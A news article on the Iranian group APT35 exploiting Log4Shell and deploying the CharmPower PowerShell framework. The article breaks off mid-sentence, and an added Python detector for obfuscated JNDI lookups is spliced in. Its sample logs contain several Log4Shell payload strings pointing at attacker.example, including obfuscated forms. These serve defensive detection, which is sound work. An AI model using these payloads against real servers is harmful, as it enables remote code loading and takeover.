A hacker group is exploiting the Apache Log4j vulnerability


Reports published recently describe a hacker group backed by the Iranian state that is actively exploiting vulnerabilities in Apache Log4j to distribute a new set of modular PowerShell tools.

As described by researchers at Check Point Software Technologies, the hacker group APT35, also known as Phosphorus and Charming Kitten, was first observed exploiting Log4j just four days after the vulnerability was publicly disclosed.

The attack setup is described as rushed, since the group simply used a publicly available open-source JNDI exploit kit rather than tooling of its own.

After gaining access to a vulnerable service, the Iranian hackers installed a new modular PowerShell-based framework called "CharmPower". The script is used to establish persistence, gather information, and execute commands.

CharmPower has four initial modules:

  • The first validates the network connection.
  • The second gathers basic system information such as the Windows version, the computer name, and the contents of various system files.
  • The third module decodes the command-and-control domain, which is retrieved from an encoded URL stored in an Amazon Web Services Inc. S3 bucket.
  • The final module receives, decrypts, and executes the follow-up modules.

Based on the information collected during the initial deployment, APT35 then deploys further custom modules to carry out data theft and to hide its presence on the infected machine.

APT35 is a well-known hacking group linked to the 2020 attacks on the Trump campaign, on current and former US government officials, on journalists covering politics, and on prominent Iranians living outside Iran. The group also targeted the Munich Security Conference that year.

"The analysis tying the exploitation of Log4Shell to the Iranian APT Charming Kitten is interesting, and in some ways contradicts, the statement made by the US Cybersecurity and Infrastructure Security Agency on January 10 that said there had been no significant intrusions related to the bug at that time."

"This may reinforce current concerns about incident disclosure and transparency, and about the lag that can exist between a threat actor's activity and its detection."

John Bambenek, principal threat hunter at IT operations company Netenrich Inc., said it is not surprising that second-tier nation-state actors are quickly taking advantage of the Log4j vulnerability.

"Any powerful exploit like this can be used by anyone looking for a quick foothold, and sometimes intelligence windows like this open, which means you have to act quickly," Bambenek said. "The bigger question is which intelligence agency was using this before the vulnerability became public."

The Log4j flaw, also known as Log4Shell and tracked as CVE-2021-44228, is a major problem because of how widely Log4j is used in enterprises and because of the large number of cloud-based servers and services that may be exposed to this zero-day-style weakness. Log4j, a free and open-source tool from the Apache Software Foundation, is a logging library, and the flaw affects versions 2.0-beta9 through 2.14.1.

Security professionals have said that the threat posed by Log4Shell is high not only because of the scale at which the library is used, but also because of how easy the vulnerability is to exploit. Attackers need only deliver a string containing a malicious JNDI lookup, which Log4j parses while logging it, causing the server to fetch and load attacker-controlled code. The hackers can then take control of
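The lookup string described above is easy to spot in its plain `${jndi:...}` form, but attackers wrap it in nested Log4j lookups (`${lower:j}`, `${upper:...}`, and the `${...:-default}` default-value trick) to slip past naive filters. The following added example, written for this page and not taken from Check Point, the article, or the Log4j project, normalizes those nesting tricks over a few constructed web-server log lines and extracts the scheme and host of any JNDI lookup that remains. The log lines, IP addresses, and `attacker.example` hostnames are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (not real captured traffic). Lines 2-5
# carry a Log4Shell probe in the User-Agent field, in increasingly obfuscated forms.
SAMPLE_LOGS = [
    '10.0.0.5 - - [11/Dec/2021:10:14:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [11/Dec/2021:10:14:09 +0000] "GET /login HTTP/1.1" 200 811 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:14:21 +0000] "GET /api HTTP/1.1" 404 0 "-" '
    '"${${lower:j}ndi:${lower:l}dap://x.attacker.example:1389/o}"',
    '10.0.0.9 - - [11/Dec/2021:10:14:22 +0000] "GET /api HTTP/1.1" 404 0 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://x.attacker.example/o}"',
    '10.0.0.11 - - [11/Dec/2021:10:15:00 +0000] "GET /x HTTP/1.1" 200 10 "-" '
    '"${${env:NOPE:-j}ndi:dns://x.attacker.example/q}"',
]

# Innermost lookup: a ${...} whose body contains no further "${", "{" or "}".
INNER = re.compile(r"\$\{([^${}]*)\}")

# After normalization, match ${jndi:<scheme>://<host[:port]> and capture both parts.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.\-]+)\s*:\s*//([^/}\s]+)", re.IGNORECASE)


def _resolve(expr: str) -> Optional[str]:
    """Evaluate one innermost lookup body the way an attacker relies on Log4j doing.

    Returns the replacement text, or None to leave the lookup untouched.
    Only the lookups commonly used for obfuscation are modelled here.
    """
    # "${key:-default}": any non-jndi key falls back to its default (e.g. "${::-j}" -> "j").
    if ":-" in expr:
        key, _, default = expr.partition(":-")
        if not key.strip().lower().startswith("jndi"):
            return default
    head, sep, rest = expr.partition(":")
    if sep and head.strip().lower() == "lower":
        return rest.lower()
    if sep and head.strip().lower() == "upper":
        return rest.upper()
    return None


def normalize(text: str, max_rounds: int = 20) -> str:
    """Repeatedly collapse innermost obfuscation lookups until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def repl(m: "re.Match[str]") -> str:
            nonlocal changed
            out = _resolve(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        text = INNER.sub(repl, text)
        if not changed:
            break
    return text


def find_jndi(line: str) -> List[Dict[str, str]]:
    """Return every JNDI lookup in a log line after de-obfuscation."""
    norm = normalize(line)
    return [
        {"scheme": m.group(1).lower(), "host": m.group(2), "normalized": m.group(0) + "..."}
        for m in JNDI.finditer(norm)
    ]


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Scan a list of log lines; each finding records the 1-based line number."""
    findings: List[Dict[str, object]] = []
    for n, line in enumerate(lines, 1):
        for hit in find_jndi(line):
            findings.append({"line": n, **hit})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"line {f['line']}: {f['scheme']}://{f['host']}")
```

In the sample set, line 1 is benign and lines 2 through 5 all reduce to a `${jndi:<scheme>://<host>}` lookup (ldap, ldap, rmi, dns). The normalization only models the `lower`, `upper`, and `:-default` lookups; other lookups such as `${date:...}` are left alone, so a real detection should run this over every header and body field an application might log, not just the User-Agent shown here, and treat any surviving `${jndi:` as hostile regardless of scheme.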

News that Iranian hackers were exploiting the Log4j vulnerability came as US Cyber Command's National Cyber Mission Force revealed that it had identified several open-source tools being used by Iranian intelligence actors on networks around the world.

That disclosure concerned the Iranian state-backed hacking group known as "MuddyWater."

The group is linked to Iran's Ministry of Intelligence and Security and has mainly targeted other countries in the Middle East, and at times countries in Europe and North America.

If you want to know more about it, you can check the information at the following link.
